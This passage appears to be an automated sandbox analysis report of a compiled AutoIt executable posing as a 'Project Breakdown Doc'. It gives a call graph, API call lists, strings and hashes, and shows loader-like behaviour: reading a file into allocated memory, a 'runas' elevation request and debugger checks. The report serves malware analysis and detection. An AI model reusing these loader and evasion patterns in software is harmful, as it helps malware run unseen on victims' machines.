99948->99950 99951 c47d2c 59 API calls 99949->99951 99952 c47c8e 59 API calls 99950->99952 99951->99940 99953 cad074 99952->99953 99954 c49997 84 API calls 99953->99954 99955 cad080 99954->99955 99975 ca42ad 99955->99975 99957 cad091 99958 ca3e73 3 API calls 99957->99958 99959 cad09b 99958->99959 99960 c49997 84 API calls 99959->99960 99963 cad0cc 99959->99963 99961 cad0b9 99960->99961 100029 ca93df 99961->100029 99964 c44faa 84 API calls 99963->99964 99964->99901 100134 ca4696 GetFileAttributesW 99965->100134 100138 cbcdf1 99968->100138 99970 cbe247 99970->99821 99971->99817 99972->99821 99973->99815 99974->99819 99976 ca42c9 99975->99976 99977 ca42ce 99976->99977 99978 ca42dc 99976->99978 99980 c481a7 59 API calls 99977->99980 99979 c477c7 59 API calls 99978->99979 99982 ca42e4 99979->99982 99981 ca42d7 Mailbox 99980->99981 99981->99957 99983 c477c7 59 API calls 99982->99983 99984 ca42ec 99983->99984 99985 c477c7 59 API calls 99984->99985 99986 ca42f7 99985->99986 99987 c477c7 59 API calls 99986->99987 99988 ca42ff 99987->99988 99989 c477c7 59 API calls 99988->99989 99990 ca4307 99989->99990 99991 c477c7 59 API calls 99990->99991 99992 ca430f 99991->99992 99993 c477c7 59 API calls 99992->99993 99994 ca4317 99993->99994 99995 c477c7 59 API calls 99994->99995 99996 ca431f 99995->99996 99997 c446f9 59 API calls 99996->99997 99998 ca4336 99997->99998 99999 c446f9 59 API calls 99998->99999 100000 ca434f 99999->100000 100001 c47b52 59 API calls 100000->100001 100002 ca435b 100001->100002 100003 ca436e 100002->100003 100004 c47e8c 59 API calls 100002->100004 100005 c47b52 59 API calls 100003->100005 100004->100003 100006 ca4377 100005->100006 100007 ca4387 100006->100007 100009 c47e8c 59 API calls 100006->100009 100008 c481a7 59 API calls 100007->100008 100010 ca4393 100008->100010 100009->100007 100011 c47c8e 59 API calls 100010->100011 100012 ca439f 100011->100012 100087 ca445f 59 API calls 100012->100087 100014 ca43ae 100088 ca445f 59 API calls 100014->100088 100016 
ca43c1 100017 c47b52 59 API calls 100016->100017 100018 ca43cb 100017->100018 100019 ca43e2 100018->100019 100020 ca43d0 100018->100020 100022 c47b52 59 API calls 100019->100022 100021 c47e0b 59 API calls 100020->100021 100023 ca43dd 100021->100023 100024 ca43eb 100022->100024 100027 c47c8e 59 API calls 100023->100027 100025 ca4409 100024->100025 100026 c47e0b 59 API calls 100024->100026 100028 c47c8e 59 API calls 100025->100028 100026->100023 100027->100025 100028->99981 100030 ca93ec __ftell_nolock 100029->100030 100031 c60ff6 Mailbox 59 API calls 100030->100031 100032 ca9449 100031->100032 100033 c4538e 59 API calls 100032->100033 100034 ca9453 100033->100034 100089 ca91e9 100034->100089 100036 ca945e 100037 c45045 85 API calls 100036->100037 100038 ca9471 _wcscmp 100037->100038 100039 ca9542 100038->100039 100040 ca9495 100038->100040 100112 ca99be 96 API calls 2 library calls 100039->100112 100109 ca99be 96 API calls 2 library calls 100040->100109 100043 ca949a 100046 ca954b 100043->100046 100110 c6432e 58 API calls __wsplitpath_helper 100043->100110 100045 c4506b 74 API calls 100047 ca9567 100045->100047 100046->99963 100048 c4506b 74 API calls 100047->100048 100050 ca9577 100048->100050 100049 ca94c3 _wcscat _wcscpy 100111 c6432e 58 API calls __wsplitpath_helper 100049->100111 100051 c4506b 74 API calls 100050->100051 100053 ca9592 100051->100053 100054 c4506b 74 API calls 100053->100054 100055 ca95a2 100054->100055 100056 c4506b 74 API calls 100055->100056 100058 ca95bd 100056->100058 100057 ca950e _wcscat 100057->100045 100057->100046 100059 c4506b 74 API calls 100058->100059 100060 ca95cd 100059->100060 100061 c4506b 74 API calls 100060->100061 100062 ca95dd 100061->100062 100063 c4506b 74 API calls 100062->100063 100064 ca95ed 100063->100064 100092 ca9b6d GetTempPathW GetTempFileNameW 100064->100092 100066 ca95f9 100067 c6548b 115 API calls 100066->100067 100077 ca960a 100067->100077 100068 ca96c4 100069 c655d6 __fcloseall 83 API calls 100068->100069 
100070 ca96cf 100069->100070 100072 ca96e9 100070->100072 100073 ca96d5 DeleteFileW 100070->100073 100071 c4506b 74 API calls 100071->100077 100074 ca978f CopyFileW 100072->100074 100079 ca96f3 _wcsncpy 100072->100079 100073->100046 100075 ca97b7 DeleteFileW 100074->100075 100076 ca97a5 DeleteFileW 100074->100076 100106 ca9b2c CreateFileW 100075->100106 100076->100046 100077->100046 100077->100068 100077->100071 100093 c64a93 100077->100093 100113 ca8d90 116 API calls __fcloseall 100079->100113 100082 ca977a 100082->100075 100083 ca977e DeleteFileW 100082->100083 100083->100046 100084->99890 100085->99926 100086->99937 100087->100014 100088->100016 100114 c6543a GetSystemTimeAsFileTime 100089->100114 100091 ca91f8 100091->100036 100092->100066 100094 c64a9f __read 100093->100094 100095 c64ad5 100094->100095 100096 c64abd 100094->100096 100097 c64acd __read 100094->100097 100098 c66e4e __lock_file 59 API calls 100095->100098 100128 c68d68 58 API calls __getptd_noexit 100096->100128 100097->100077 100100 c64adb 100098->100100 100116 c6493a 100100->100116 100101 c64ac2 100129 c68ff6 9 API calls __read 100101->100129 100107 ca9b68 100106->100107 100108 ca9b52 SetFileTime CloseHandle 100106->100108 100107->100046 100108->100107 100109->100043 100110->100049 100111->100057 100112->100057 100113->100082 100115 c65468 __aulldiv 100114->100115 100115->100091 100119 c64949 100116->100119 100122 c64967 100116->100122 100117 c64957 100131 c68d68 58 API calls __getptd_noexit 100117->100131 100119->100117 100119->100122 100123 c64981 _memmove 100119->100123 100120 c6495c 100132 c68ff6 9 API calls __read 100120->100132 100130 c64b0d LeaveCriticalSection LeaveCriticalSection _fseek 100122->100130 100123->100122 100125 c64c6d __flush 78 API calls 100123->100125 100126 c64916 _fprintf 58 API calls 100123->100126 100127 c6dac6 __write 78 API calls 100123->100127 100133 c6b05e 78 API calls 7 library calls 100123->100133 100125->100123 100126->100123 100127->100123 100128->100101 
100129->100097 100130->100097 100131->100120 100132->100122 100133->100123 100135 ca3e7a 100134->100135 100136 ca46b1 FindFirstFileW 100134->100136 100135->99821 100136->100135 100137 ca46c6 FindClose 100136->100137 100137->100135 100139 c49997 84 API calls 100138->100139 100140 cbce2e 100139->100140 100164 cbce75 Mailbox 100140->100164 100176 cbdab9 100140->100176 100142 cbd0cd 100143 cbd242 100142->100143 100147 cbd0db 100142->100147 100215 cbdbdc 92 API calls Mailbox 100143->100215 100146 cbd251 100146->100147 100148 cbd25d 100146->100148 100189 cbcc82 100147->100189 100148->100164 100149 c49997 84 API calls 100167 cbcec6 Mailbox 100149->100167 100154 cbd114 100204 c60e48 100154->100204 100157 cbd12e 100210 caa0b5 89 API calls 4 library calls 100157->100210 100158 cbd147 100159 c4942e 59 API calls 100158->100159 100162 cbd153 100159->100162 100161 cbd139 GetCurrentProcess TerminateProcess 100161->100158 100163 c491b0 59 API calls 100162->100163 100165 cbd169 100163->100165 100164->99970 100175 cbd190 100165->100175 100211 c48ea0 59 API calls Mailbox 100165->100211 100167->100142 100167->100149 100167->100164 100208 caf835 59 API calls 2 library calls 100167->100208 100209 cbd2f3 61 API calls 2 library calls 100167->100209 100168 cbd2b8 100168->100164 100172 cbd2cc FreeLibrary 100168->100172 100169 cbd17f 100212 cbd95d 107 API calls _free 100169->100212 100172->100164 100175->100168 100213 c48ea0 59 API calls Mailbox 100175->100213 100214 c49e9c 60 API calls Mailbox 100175->100214 100216 cbd95d 107 API calls _free 100175->100216 100177 c47faf 59 API calls 100176->100177 100178 cbdad4 CharLowerBuffW 100177->100178 100217 c9f658 100178->100217 100182 c477c7 59 API calls 100183 cbdb0d 100182->100183 100184 c479ab 59 API calls 100183->100184 100186 cbdb24 100184->100186 100185 cbdb6c Mailbox 100185->100167 100187 c47e8c 59 API calls 100186->100187 100188 cbdb30 Mailbox 100187->100188 100188->100185 100224 cbd2f3 61 API calls 2 library calls 100188->100224 100190 
cbcc9d 100189->100190 100194 cbccf2 100189->100194 100191 c60ff6 Mailbox 59 API calls 100190->100191 100193 cbccbf 100191->100193 100192 c60ff6 Mailbox 59 API calls 100192->100193 100193->100192 100193->100194 100195 cbdd64 100194->100195 100196 cbdf8d Mailbox 100195->100196 100203 cbdd87 _strcat _wcscpy __wsetenvp 100195->100203 100196->100154 100197 c49c9c 59 API calls 100197->100203 100198 c49d46 59 API calls 100198->100203 100199 c49cf8 59 API calls 100199->100203 100200 c6594c 58 API calls _W_store_winword 100200->100203 100201 c49997 84 API calls 100201->100203 100203->100196 100203->100197 100203->100198 100203->100199 100203->100200 100203->100201 100227 ca5b29 61 API calls 2 library calls 100203->100227 100205 c60e5d 100204->100205 100206 c60ef5 VirtualAlloc 100205->100206 100207 c60ec3 100205->100207 100206->100207 100207->100157 100207->100158 100208->100167 100209->100167 100210->100161 100211->100169 100212->100175 100213->100175 100214->100175 100215->100146 100216->100175 100218 c9f683 __wsetenvp 100217->100218 100219 c9f6c2 100218->100219 100222 c9f6b8 100218->100222 100223 c9f769 100218->100223 100219->100182 100219->100188 100222->100219 100225 c47a24 61 API calls 100222->100225 100223->100219 100226 c47a24 61 API calls 100223->100226 100224->100185 100225->100222 100226->100223 100227->100203 100229 c47dbf __wsetenvp 100228->100229 100230 c48189 59 API calls 100229->100230 100231 c47dd0 _memmove 100229->100231 100232 c7f130 _memmove 100230->100232 100231->98739 100233 c43633 100234 c4366a 100233->100234 100235 c436e7 100234->100235 100236 c43688 100234->100236 100273 c436e5 100234->100273 100240 c436ed 100235->100240 100241 c7d31c 100235->100241 100237 c43695 100236->100237 100238 c4375d PostQuitMessage 100236->100238 100242 c436a0 100237->100242 100243 c7d38f 100237->100243 100274 c436d8 100238->100274 100239 c436ca DefWindowProcW 100239->100274 100245 c43715 SetTimer RegisterWindowMessageW 100240->100245 100246 c436f2 100240->100246 100283 
c511d0 10 API calls Mailbox 100241->100283 100247 c43767 100242->100247 100248 c436a8 100242->100248 100287 ca2a16 71 API calls _memset 100243->100287 100249 c4373e CreatePopupMenu 100245->100249 100245->100274 100252 c7d2bf 100246->100252 100253 c436f9 KillTimer 100246->100253 100281 c44531 64 API calls _memset 100247->100281 100255 c7d374 100248->100255 100256 c436b3 100248->100256 100249->100274 100251 c7d343 100284 c511f3 341 API calls Mailbox 100251->100284 100259 c7d2c4 100252->100259 100260 c7d2f8 MoveWindow 100252->100260 100278 c444cb Shell_NotifyIconW _memset 100253->100278 100255->100239 100286 c9817e 59 API calls Mailbox 100255->100286 100262 c4374b 100256->100262 100264 c436be 100256->100264 100266 c7d2e7 SetFocus 100259->100266 100267 c7d2c8 100259->100267 100260->100274 100261 c4370c 100279 c43114 DeleteObject DestroyWindow Mailbox 100261->100279 100280 c445df 81 API calls _memset 100262->100280 100263 c7d3a1 100263->100239 100263->100274 100264->100239 100285 c444cb Shell_NotifyIconW _memset 100264->100285 100265 c4375b 100265->100274 100266->100274 100267->100264 100268 c7d2d1 100267->100268 100282 c511d0 10 API calls Mailbox 100268->100282 100273->100239 100276 c7d368 100277 c443db 68 API calls 100276->100277 100277->100273 100278->100261 100279->100274 100280->100265 100281->100265 100282->100274 100283->100251 100284->100264 100285->100276 100286->100273 100287->100263 100288 17823b0 100302 1780000 100288->100302 100290 178246b 100305 17822a0 100290->100305 100292 1782494 CreateFileW 100294 17824e8 100292->100294 100295 17824e3 100292->100295 100294->100295 100296 17824ff VirtualAlloc 100294->100296 100296->100295 100297 178251d ReadFile 100296->100297 100297->100295 100298 1782538 100297->100298 100299 17812a0 13 API calls 100298->100299 100300 178256b 100299->100300 100301 178258e ExitProcess 100300->100301 100301->100295 100308 1783490 GetPEB 100302->100308 100304 178068b 100304->100290 100306 17822a9 Sleep 100305->100306 100307 17822b7 
100306->100307 100309 17834ba 100308->100309 100309->100304 100310 c4107d 100315 c471eb 100310->100315 100312 c4108c 100313 c62f80 __cinit 67 API calls 100312->100313 100314 c41096 100313->100314 100316 c471fb __ftell_nolock 100315->100316 100317 c477c7 59 API calls 100316->100317 100318 c472b1 100317->100318 100319 c44864 61 API calls 100318->100319 100320 c472ba 100319->100320 100346 c6074f 100320->100346 100323 c47e0b 59 API calls 100324 c472d3 100323->100324 100325 c43f84 59 API calls 100324->100325 100326 c472e2 100325->100326 100327 c477c7 59 API calls 100326->100327 100328 c472eb 100327->100328 100329 c47eec 59 API calls 100328->100329 100330 c472f4 RegOpenKeyExW 100329->100330 100331 c7ecda RegQueryValueExW 100330->100331 100335 c47316 Mailbox 100330->100335 100332 c7ecf7 100331->100332 100333 c7ed6c RegCloseKey 100331->100333 100334 c60ff6 Mailbox 59 API calls 100332->100334 100333->100335 100339 c7ed7e _wcscat Mailbox __wsetenvp 100333->100339 100336 c7ed10 100334->100336 100335->100312 100338 c4538e 59 API calls 100336->100338 100337 c47b52 59 API calls 100337->100339 100340 c7ed1b RegQueryValueExW 100338->100340 100339->100335 100339->100337 100344 c47f41 59 API calls 100339->100344 100345 c43f84 59 API calls 100339->100345 100341 c7ed38 100340->100341 100343 c7ed52 100340->100343 100342 c47d2c 59 API calls 100341->100342 100342->100343 100343->100333 100344->100339 100345->100339 100347 c71b90 __ftell_nolock 100346->100347 100348 c6075c GetFullPathNameW 100347->100348 100349 c6077e 100348->100349 100350 c47d2c 59 API calls 100349->100350 100351 c472c5 100350->100351 100351->100323 100352 ca8f97 100353 ca8fa4 100352->100353 100356 ca8faa 100352->100356 100354 c62f95 _free 58 API calls 100353->100354 100354->100356 100355 ca8fbb 100358 ca8fcd 100355->100358 100359 c62f95 _free 58 API calls 100355->100359 100356->100355 100357 c62f95 _free 58 API calls 100356->100357 100357->100355 100359->100358 100360 c80226 100366 c4ade2 Mailbox 100360->100366 100362 
c80c86 100374 c966f4 59 API calls Mailbox 100362->100374 100364 c80c8f 100366->100362 100366->100364 100367 c800e0 VariantClear 100366->100367 100368 c4b6c1 100366->100368 100370 cbe237 130 API calls 100366->100370 100371 c49df0 59 API calls Mailbox 100366->100371 100372 c97405 59 API calls 100366->100372 100367->100366 100373 caa0b5 89 API calls 4 library calls 100368->100373 100370->100366 100371->100366 100372->100366 100373->100362 100374->100364

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C43B7A
                                                  • IsDebuggerPresent.KERNEL32 ref: 00C43B8C
                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00D062F8,00D062E0,?,?), ref: 00C43BFD
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                    • Part of subcall function 00C50A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C43C26,00D062F8,?,?,?), ref: 00C50ACE
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C43C81
                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00CF93F0,00000010), ref: 00C7D4BC
                                                  • SetCurrentDirectoryW.KERNEL32(?,00D062F8,?,?,?), ref: 00C7D4F4
                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CF5D40,00D062F8,?,?,?), ref: 00C7D57A
                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 00C7D581
                                                    • Part of subcall function 00C43A58: GetSysColorBrush.USER32(0000000F), ref: 00C43A62
                                                    • Part of subcall function 00C43A58: LoadCursorW.USER32(00000000,00007F00), ref: 00C43A71
                                                    • Part of subcall function 00C43A58: LoadIconW.USER32(00000063), ref: 00C43A88
                                                    • Part of subcall function 00C43A58: LoadIconW.USER32(000000A4), ref: 00C43A9A
                                                    • Part of subcall function 00C43A58: LoadIconW.USER32(000000A2), ref: 00C43AAC
                                                    • Part of subcall function 00C43A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C43AD2
                                                    • Part of subcall function 00C43A58: RegisterClassExW.USER32(?), ref: 00C43B28
                                                    • Part of subcall function 00C439E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C43A15
                                                    • Part of subcall function 00C439E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C43A36
                                                    • Part of subcall function 00C439E7: ShowWindow.USER32(00000000,?,?), ref: 00C43A4A
                                                    • Part of subcall function 00C439E7: ShowWindow.USER32(00000000,?,?), ref: 00C43A53
                                                    • Part of subcall function 00C443DB: _memset.LIBCMT ref: 00C44401
                                                    • Part of subcall function 00C443DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C444A6
                                                  Strings
                                                  • This is a third-party compiled AutoIt script., xrefs: 00C7D4B4
                                                  • runas, xrefs: 00C7D575
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                  • String ID: This is a third-party compiled AutoIt script.$runas
                                                  • API String ID: 529118366-3287110873
                                                  • Opcode ID: b2d9f72e7598283df7283360799cf09251cfa6f3ee0afedd38d917f9e7f047ee
                                                  • Instruction ID: 633c7077bc0483c5aebe509b2aff81406fd7682ad2ac50276ebd5b1eed157367
                                                  • Opcode Fuzzy Hash: b2d9f72e7598283df7283360799cf09251cfa6f3ee0afedd38d917f9e7f047ee
                                                  • Instruction Fuzzy Hash: 8F51E230D04289AECF11ABB4DC45FFD7B79BF44300F044269F86AA62A1CB709656EB35

                                                  Control-flow Graph: graph image not reproduced in text.
                                                  APIs
                                                  • GetVersionExW.KERNEL32(?), ref: 00C44B2B
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                  • GetCurrentProcess.KERNEL32(?,00CCFAEC,00000000,00000000,?), ref: 00C44BF8
                                                  • IsWow64Process.KERNEL32(00000000), ref: 00C44BFF
                                                  • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00C44C45
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00C44C50
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00C44C81
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00C44C8D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                  • String ID:
                                                  • API String ID: 1986165174-0
                                                  • Opcode ID: 6f983e8a7ace0e6c6a728701af4ed3937d740014e2be8549e1a6cca876376059
                                                  • Instruction ID: 2c267985b8099c0e7193831a4a37a671cc2bdaf26dd5fe6486578007e11c0145
                                                  • Opcode Fuzzy Hash: 6f983e8a7ace0e6c6a728701af4ed3937d740014e2be8549e1a6cca876376059
                                                  • Instruction Fuzzy Hash: 3991C43154ABC0DEC735CB6885917AABFF5BF25300F588A9DD0DB93A01D220EA48D719

                                                  Control-flow Graph: graph image not reproduced in text.
                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C44EEE,?,?,00000000,00000000), ref: 00C44FF9
                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C44EEE,?,?,00000000,00000000), ref: 00C45010
                                                  • LoadResource.KERNEL32(?,00000000,?,?,00C44EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C44F8F), ref: 00C7DD60
                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00C44EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C44F8F), ref: 00C7DD75
                                                  • LockResource.KERNEL32(00C44EEE,?,?,00C44EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C44F8F,00000000), ref: 00C7DD88
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                  • String ID: SCRIPT
                                                  • API String ID: 3051347437-3967369404
                                                  • Opcode ID: 4580c30dbbf27a386072143b624fc7ba7b586b38b75893316272f52588f9fe58
                                                  • Instruction ID: 4d5c28f04e38839be6c8d677a74c4a710cb8f7e556a2a42605f385f89a0fae61
                                                  • Opcode Fuzzy Hash: 4580c30dbbf27a386072143b624fc7ba7b586b38b75893316272f52588f9fe58
                                                  • Instruction Fuzzy Hash: 2A112A75240701AFE7258B65DC58F6B7BBEFBC9B51F20816CF41696260DB61EC018670
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00C7E7C1), ref: 00CA46A6
                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00CA46B7
                                                  • FindClose.KERNEL32(00000000), ref: 00CA46C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FileFind$AttributesCloseFirst
                                                  • String ID:
                                                  • API String ID: 48322524-0
                                                  • Opcode ID: 5102b1a051341df1bfc0086f2dac001cbf8ad67ec2c6d66407b527c03155c5e2
                                                  • Instruction ID: 47f6af5c9ddf8a17a2c82a3380ce3a6f06b14765ea7437b01aa9505c0c2d59c7
                                                  • Opcode Fuzzy Hash: 5102b1a051341df1bfc0086f2dac001cbf8ad67ec2c6d66407b527c03155c5e2
                                                  • Instruction Fuzzy Hash: 34E0D8314108016B42146738EC4D9EE775D9E47339F100719F935C10E0E7F059518595
                                                  Strings
                                                  • Variable must be of type 'Object'., xrefs: 00C8428C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Variable must be of type 'Object'.
                                                  • API String ID: 0-109567571
                                                  • Opcode ID: beb5da1290f779e42d5294626025fea62d0dc1da563e4696e5e43500e55a8ab0
                                                  • Instruction ID: 570335da1dd886cafa146b0f84a976b5d02c69634077e547e844ffcfdbd8aec4
                                                  • Opcode Fuzzy Hash: beb5da1290f779e42d5294626025fea62d0dc1da563e4696e5e43500e55a8ab0
                                                  • Instruction Fuzzy Hash: A4A2AF74E04206CFCB24DF98C480AAEB7B1FF58314F258169E916AB351D771EE42CB95
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C50BBB
                                                  • timeGetTime.WINMM ref: 00C50E76
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C50FB3
                                                  • TranslateMessage.USER32(?), ref: 00C50FC7
                                                  • DispatchMessageW.USER32(?), ref: 00C50FD5
                                                  • Sleep.KERNEL32(0000000A), ref: 00C50FDF
                                                  • LockWindowUpdate.USER32(00000000,?,?), ref: 00C5105A
                                                  • DestroyWindow.USER32 ref: 00C51066
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C51080
                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00C852AD
                                                  • TranslateMessage.USER32(?), ref: 00C8608A
                                                  • DispatchMessageW.USER32(?), ref: 00C86098
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C860AC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                  • API String ID: 4003667617-3242690629
                                                  • Opcode ID: ee5bff8ccd931b9afe13ad61a9769cb0ad0101111d20bee2fd4a0ebf9b47b3ab
                                                  • Instruction ID: 88f054137ea4240fcbf37a3ccfe83296161f13bd2ddd36dcf819f952d1017fda
                                                  • Opcode Fuzzy Hash: ee5bff8ccd931b9afe13ad61a9769cb0ad0101111d20bee2fd4a0ebf9b47b3ab
                                                  • Instruction Fuzzy Hash: B7B2D374608741DFD724DF24C884BAEB7E1BF84308F24491DF89987291DBB0E988DB5A

                                                  Control-flow Graph: graph image not reproduced in text.

                                                  APIs
                                                    • Part of subcall function 00CA91E9: __time64.LIBCMT ref: 00CA91F3
                                                    • Part of subcall function 00C45045: _fseek.LIBCMT ref: 00C4505D
                                                  • __wsplitpath.LIBCMT ref: 00CA94BE
                                                    • Part of subcall function 00C6432E: __wsplitpath_helper.LIBCMT ref: 00C6436E
                                                  • _wcscpy.LIBCMT ref: 00CA94D1
                                                  • _wcscat.LIBCMT ref: 00CA94E4
                                                  • __wsplitpath.LIBCMT ref: 00CA9509
                                                  • _wcscat.LIBCMT ref: 00CA951F
                                                  • _wcscat.LIBCMT ref: 00CA9532
                                                    • Part of subcall function 00CA922F: _memmove.LIBCMT ref: 00CA9268
                                                    • Part of subcall function 00CA922F: _memmove.LIBCMT ref: 00CA9277
                                                  • _wcscmp.LIBCMT ref: 00CA9479
                                                    • Part of subcall function 00CA99BE: _wcscmp.LIBCMT ref: 00CA9AAE
                                                    • Part of subcall function 00CA99BE: _wcscmp.LIBCMT ref: 00CA9AC1
                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CA96DC
                                                  • _wcsncpy.LIBCMT ref: 00CA974F
                                                  • DeleteFileW.KERNEL32(?,?), ref: 00CA9785
